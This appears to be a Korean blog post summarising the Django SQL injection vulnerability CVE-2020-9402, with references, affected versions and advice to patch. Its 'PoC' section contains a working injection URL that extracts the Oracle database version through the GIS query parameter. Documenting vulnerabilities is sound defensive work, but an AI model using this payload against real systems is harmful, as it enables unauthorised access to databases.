티스토리 뷰

CVE 취약점

[CVE 취약점] Django 제품 SQL Injection 취약점(CVE-2020-9402)

정뚱띵 2020. 11. 1. 22:40
728x90
반응형

[CVE 취약점] Django 제품 SQL Injection 취약점(CVE-2020-9402)


참조

https://xz.aliyun.com/t/7403

https://christa.top/details/53/

https://twitter.com/chybeta/status/1241907287217729538

https://www.krcert.or.kr/data/secNoticeView.do?bulletin_writing_sequence=35301


Poc 

http://localhost:8000/test/?q=20) = 1 OR (select utl_inaddr.get_host_name((SELECT version FROM v%24instance)) from dual) is null%20 OR (1%2B1
  -> http://localhost:8000/test/?q=20) = 1 OR (select utl_inaddr.get_host_name((SELECT version FROM v$instance)) from dual) is null  OR (1+1


개요

최근 Django*에서 SQL Injection취약점(CVE-2020-9402)을 악용할 수 있는 개념증명코드(Proof of concept, PoC)가 인터넷상에 공개되어 사용자의 보안 업데이트 필요

     * Django : 파이썬으로 제작된 오픈소스 웹 어플리케이션 프레임워크


Django 제품에서 특정함수(GIS)의 인자값 검증이 미흡하여 발생하는 SQL Injection 취약점(CVE-2020-9402)


영향 받는 제품 버전

Django 1.11

Django 2.2

Django 3.0


방안

참고사이트(Django 홈페이지)의 “News&Events” 부분을 참고하여 패치 적용

728x90
반응형
저작자표시

'CVE 취약점' 카테고리의 다른 글

[CVE 취약점] Apache Tomcat 서비스 거부 취약점(CVE-2020-11996)  (0) 2020.11.02
[CVE 취약점] Apache Tomecat RCE 취약점(CVE-2020-9484)  (0) 2020.11.01
[CVE 취약점] MS SMBv3 프로토콜 취약점(CVE-2020-0796)  (0) 2020.11.01
[CVE 취약점] Citrix ADC/Gateway 제품 원격코드 실행 취약점(CVE-2019-19781)  (0) 2020.10.31
[CVE 취약점] vBulletin 원격 코드 실행 취약점(CVE-2019-16759)  (0) 2020.10.31
댓글
공지사항
최근에 올라온 글
최근에 달린 댓글
Total
Today
250x250